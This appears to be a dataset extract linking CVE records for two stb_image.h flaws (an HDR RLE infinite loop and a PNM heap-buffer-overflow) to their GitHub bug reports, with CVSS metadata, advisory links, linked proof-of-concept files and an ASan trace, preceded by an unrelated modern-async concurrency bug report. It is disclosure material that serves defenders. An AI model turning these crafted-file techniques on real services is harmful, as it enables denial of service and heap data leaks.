See this Code: ```js //@ts-ignore var {forEachLimit}=require('modern-async') var ar=[] for(let i=0;i<=100;i++) ar.push(i) forEachLimit(ar,async item=>{ await delay(1000) console.log(item) },5) function delay(ms){return new Promise(resolve=>setTimeout(resolve,ms))} ``` It should show every 1 seconds 5 items. But it shows after 1 second all the items. I found the bug and I wanted to fix it: In the file forEachLimit.js: ```js async function forEachLimit (iterable, iteratee, concurrency) { await mapLimit(iterable, async (v, i, t) => { iteratee(v, i, t) }, concurrency) } ``` missing await before ```iteratee(v, i ,t)``` I wanted to fix it but the current version in GitHub is different (in development). Can you provide hotfix and publish it to NPM as 1.0.4? It's really a security issue for servers to handle too many requests at the same time. By the way, thank you for you awesome library.
forEachLimit is ignoring the concurrent paramter
https://api.github.com/repos/nicolas-van/modern-async/issues/5/comments
1
2021-10-20T05:17:12Z
2021-10-26T07:49:53Z
https://github.com/nicolas-van/modern-async/issues/5
1,030,984,396
5
2,709
CVE-2021-42715
2021-10-21T19:15:08.017
An issue was discovered in stb stb_image.h 1.33 through 2.27. The HDR loader parsed truncated end-of-file RLE scanlines as an infinite sequence of zero-length runs. An attacker could potentially have caused denial of service in applications using stb_image by submitting crafted HDR files.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/1224" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/nothings/stb/pull/1223" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00045.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3TDGZFLBOP27LZKLH45WQLSNPSPP7S7Z/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AF2CNP4FVC6LDKNOO4WDCGNDYIP3MPK6/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BEGXBDEMTFGINETMJENBZ6SCHVEJQJSY/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CI23LXPEV2GCDQTJSKO6CIILBDTI3R42/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FTZXHFZD36BGE5P6JF252NZZLKMGCY4T/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/G2M5CRSGPRF7G3YB5CLU4FXW7ANNHAYT/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ID6II3RIKAMVGVMC6ZAQIXXYYDMTVC4N/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TXX76TJMZBPN3NU542MGN6B7C7QHRFGB/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VP2YEXEAJWI76FPM7D7VXHWD3WESQEYC/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/1224" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/nothings/stb/pull/1223" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00045.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3TDGZFLBOP27LZKLH45WQLSNPSPP7S7Z/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AF2CNP4FVC6LDKNOO4WDCGNDYIP3MPK6/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BEGXBDEMTFGINETMJENBZ6SCHVEJQJSY/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CI23LXPEV2GCDQTJSKO6CIILBDTI3R42/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FTZXHFZD36BGE5P6JF252NZZLKMGCY4T/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/G2M5CRSGPRF7G3YB5CLU4FXW7ANNHAYT/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ID6II3RIKAMVGVMC6ZAQIXXYYDMTVC4N/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TXX76TJMZBPN3NU542MGN6B7C7QHRFGB/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VP2YEXEAJWI76FPM7D7VXHWD3WESQEYC/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nothings:stb_image.h:*:*:*:*:*:*:*:*", "matchCriteriaId": "999F1FA2-C650-44D5-84C5-444967092386", "versionEndExcluding": null, "versionEndIncluding": "2.27", "versionStartExcluding": null, "versionStartIncluding": "1.33", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "matchCriteriaId": "E460AA51-FCDA-46B9-AE97-E6676AA5E194", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "835" ]
835
https://github.com/nothings/stb/issues/1224
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "nothings", "stb" ]
**Summary** stb_image's HDR loader in versions 1.33 to and including v2.27 parsed truncated end-of-file RLE scanlines as an infinite sequence of zero-length runs. An attacker could potentially have caused denial of service in applications using stb_image by submitting specially constructed HDR files. CVE number: [CVE-2021-42715](https://nvd.nist.gov/vuln/detail/CVE-2021-42715) **Describe the bug** In stb_image's HDR reader, loading a specially constructed invalid HDR file can result in an infinite loop within the RLE decoder. This issue includes a fix in pull request #1223, and a proof of concept file that can be used to reproduce the crash. We're reporting this on GitHub Issues following the guidance in issue #1213. The issue occurs in [this loop](https://github.com/nothings/stb/blob/master/stb_image.h#L7184) within `stbi__hdr_load()`: ``` while ((nleft = width - i) > 0) { count = stbi__get8(s); if (count > 128) { // Run value = stbi__get8(s); count -= 128; if (count > nleft) { STBI_FREE(hdr_data); STBI_FREE(scanline); return stbi__errpf("corrupt", "bad RLE data in HDR"); } for (z = 0; z < count; ++z) scanline[i++ * 4 + k] = value; } else { // Dump if (count > nleft) { STBI_FREE(hdr_data); STBI_FREE(scanline); return stbi__errpf("corrupt", "bad RLE data in HDR"); } for (z = 0; z < count; ++z) scanline[i++ * 4 + k] = stbi__get8(s); } } ``` The proof of concept file manages to get this part of the decoder into a state where: * `nleft` is equal to 11; * `s` is at the end of the file. Because `s` is at the end of the file, `stbi__get8()` always returns 0, since `s->img_buffer == s->img_buffer_end` here: ``` stbi_inline static stbi_uc stbi__get8(stbi__context *s) { if (s->img_buffer < s->img_buffer_end) return *s->img_buffer++; if (s->read_from_callbacks) { stbi__refill_buffer(s); return *s->img_buffer++; } return 0; } ``` This means that `count` is always set to 0; this passes the error check, but doesn't affect any program state, meaning that the loop runs forever, an availability issue. **To Reproduce** This .zip contains a 222 KB .hdr file, rle_iloop_poc.hdr, which reproduces this issue: [rle_iloop_poc.zip](https://github.com/nothings/stb/files/7306659/rle_iloop_poc.zip) Calling `stbi_load()` with a path to this file never returns. I was able to verify this using tests/image_test.c (modified slightly in order to build) on Windows version 20H2 with Microsoft Visual Studio 2019, and I expect it should reproduce on other systems as well. This file was found using the [Radamsa fuzzer](https://gitlab.com/akihe/radamsa). I think this particular file works by setting the RLE flags on the last scanline in the file and being truncated in just the right place, but I'm not 100% sure. **Expected behavior** stbi_load should eventually return. Based on Bruce Walter's [https://www.graphics.cornell.edu/~bjw/rgbe/rgbe.c HDR reader](https://www.graphics.cornell.edu/~bjw/rgbe/rgbe.c), it seems like the intended behavior is that a run length of 0 should be treated as invalid, which is the approach the pull request takes. However, other solutions are possible (e.g. detecting when the end of the file has been reached) - I don't have any preference either way. Thanks!
In stb_image's HDR reader, loading a specially constructed invalid HDR file can result in an infinite loop within the RLE decoder
https://api.github.com/repos/nothings/stb/issues/1224/comments
4
2021-10-07T20:06:19Z
2023-01-29T23:48:43Z
https://github.com/nothings/stb/issues/1224
1,020,414,414
1,224
2,710
CVE-2021-42716
2021-10-21T19:15:08.083
An issue was discovered in stb stb_image.h 2.27. The PNM loader incorrectly interpreted 16-bit PGM files as 8-bit when converting to RGBA, leading to a buffer overflow when later reinterpreting the result as a 16-bit buffer. An attacker could potentially have crashed a service using stb_image, or read up to 1024 bytes of non-consecutive heap data without control over the read location.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/1166" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/1225" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/nothings/stb/pull/1223" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3TDGZFLBOP27LZKLH45WQLSNPSPP7S7Z/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AF2CNP4FVC6LDKNOO4WDCGNDYIP3MPK6/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BEGXBDEMTFGINETMJENBZ6SCHVEJQJSY/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CI23LXPEV2GCDQTJSKO6CIILBDTI3R42/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FTZXHFZD36BGE5P6JF252NZZLKMGCY4T/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/G2M5CRSGPRF7G3YB5CLU4FXW7ANNHAYT/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ID6II3RIKAMVGVMC6ZAQIXXYYDMTVC4N/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TXX76TJMZBPN3NU542MGN6B7C7QHRFGB/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VP2YEXEAJWI76FPM7D7VXHWD3WESQEYC/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/1166" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/1225" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/nothings/stb/pull/1223" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3TDGZFLBOP27LZKLH45WQLSNPSPP7S7Z/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AF2CNP4FVC6LDKNOO4WDCGNDYIP3MPK6/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BEGXBDEMTFGINETMJENBZ6SCHVEJQJSY/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CI23LXPEV2GCDQTJSKO6CIILBDTI3R42/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FTZXHFZD36BGE5P6JF252NZZLKMGCY4T/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/G2M5CRSGPRF7G3YB5CLU4FXW7ANNHAYT/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ID6II3RIKAMVGVMC6ZAQIXXYYDMTVC4N/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TXX76TJMZBPN3NU542MGN6B7C7QHRFGB/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VP2YEXEAJWI76FPM7D7VXHWD3WESQEYC/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nothings:stb_image.h:2.27:*:*:*:*:*:*:*", "matchCriteriaId": "026BA031-EE47-451B-8A8C-1CE5F0233D27", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "matchCriteriaId": "E460AA51-FCDA-46B9-AE97-E6676AA5E194", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/nothings/stb/issues/1166
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "nothings", "stb" ]
i find a heap-buffer-overflow(oob read) [poc.zip](https://github.com/nothings/stb/files/6815470/poc.zip) in stbi__pnm_load, if req_comp && req_comp != s->img_n, the will call stbi__convert_format, But it does not multiply ri->bits_per_channel / 8, 0 ,if ri.bits_per_channel != 8, will call stbi__convert_16_to_8, and make oob read `./test poc` `================================================================= ==15240==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62100000249c at pc 0x5647f49c70ae bp 0x7ffdee668420 sp 0x7ffdee668410 READ of size 2 at 0x62100000249c thread T0 #0 0x5647f49c70ad in stbi__convert_16_to_8(unsigned short*, int, int, int) (/home/test/stb/poc/test+0x170ad) #1 0x5647f49c7819 in stbi__load_and_postprocess_8bit(stbi__context*, int*, int*, int*, int) (/home/test/stb/poc/test+0x17819) #2 0x5647f49c8107 in stbi_load_from_file (/home/test/stb/poc/test+0x18107) #3 0x5647f49c7ffc in stbi_load (/home/test/stb/poc/test+0x17ffc) #4 0x5647f4a014df in main (/home/test/stb/poc/test+0x514df) #5 0x7f521b45abf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #6 0x5647f49b6269 in _start (/home/test/stb/poc/test+0x6269) 0x62100000249c is located 0 bytes to the right of 3996-byte region [0x621000001500,0x62100000249c) allocated by thread T0 here: #0 0x7f521c02fb40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40) #1 0x5647f49c68d2 in stbi__malloc(unsigned long) (/home/test/stb/poc/test+0x168d2) #2 0x5647f49c6b1f in stbi__malloc_mad3(int, int, int, int) (/home/test/stb/poc/test+0x16b1f) #3 0x5647f49ca7f0 in stbi__convert_format(unsigned char*, int, int, unsigned int, unsigned int) (/home/test/stb/poc/test+0x1a7f0) #4 0x5647f4a00005 in stbi__pnm_load(stbi__context*, int*, int*, int*, int, stbi__result_info*) (/home/test/stb/poc/test+0x50005) #5 0x5647f49c6e91 in stbi__load_main(stbi__context*, int*, int*, int*, int, stbi__result_info*, int) (/home/test/stb/poc/test+0x16e91) #6 0x5647f49c7663 in stbi__load_and_postprocess_8bit(stbi__context*, int*, int*, int*, int) (/home/test/stb/poc/test+0x17663) #7 0x5647f49c8107 in stbi_load_from_file (/home/test/stb/poc/test+0x18107) #8 0x5647f49c7ffc in stbi_load (/home/test/stb/poc/test+0x17ffc) #9 0x5647f4a014df in main (/home/test/stb/poc/test+0x514df) #10 0x7f521b45abf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/test/stb/poc/test+0x170ad) in stbi__convert_16_to_8(unsigned short*, int, int, int) Shadow bytes around the buggy address: 0x0c427fff8440: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c427fff8450: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c427fff8460: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c427fff8470: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c427fff8480: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c427fff8490: 00 00 00[04]fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fff84a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fff84b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fff84c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fff84d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fff84e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==15240==ABORTING `
stbi__pnm_load heap-buffer-overflow bug
https://api.github.com/repos/nothings/stb/issues/1166/comments
3
2021-07-14T10:52:47Z
2023-01-29T23:48:49Z
https://github.com/nothings/stb/issues/1166
944,299,089
1,166
2,711
CVE-2021-42716
2021-10-21T19:15:08.083
An issue was discovered in stb stb_image.h 2.27. The PNM loader incorrectly interpreted 16-bit PGM files as 8-bit when converting to RGBA, leading to a buffer overflow when later reinterpreting the result as a 16-bit buffer. An attacker could potentially have crashed a service using stb_image, or read up to 1024 bytes of non-consecutive heap data without control over the read location.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/1166" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/1225" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/nothings/stb/pull/1223" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3TDGZFLBOP27LZKLH45WQLSNPSPP7S7Z/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AF2CNP4FVC6LDKNOO4WDCGNDYIP3MPK6/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BEGXBDEMTFGINETMJENBZ6SCHVEJQJSY/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CI23LXPEV2GCDQTJSKO6CIILBDTI3R42/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FTZXHFZD36BGE5P6JF252NZZLKMGCY4T/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/G2M5CRSGPRF7G3YB5CLU4FXW7ANNHAYT/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ID6II3RIKAMVGVMC6ZAQIXXYYDMTVC4N/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TXX76TJMZBPN3NU542MGN6B7C7QHRFGB/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VP2YEXEAJWI76FPM7D7VXHWD3WESQEYC/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/1166" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/1225" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/nothings/stb/pull/1223" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3TDGZFLBOP27LZKLH45WQLSNPSPP7S7Z/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AF2CNP4FVC6LDKNOO4WDCGNDYIP3MPK6/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BEGXBDEMTFGINETMJENBZ6SCHVEJQJSY/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CI23LXPEV2GCDQTJSKO6CIILBDTI3R42/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FTZXHFZD36BGE5P6JF252NZZLKMGCY4T/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/G2M5CRSGPRF7G3YB5CLU4FXW7ANNHAYT/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ID6II3RIKAMVGVMC6ZAQIXXYYDMTVC4N/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TXX76TJMZBPN3NU542MGN6B7C7QHRFGB/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VP2YEXEAJWI76FPM7D7VXHWD3WESQEYC/" } ]
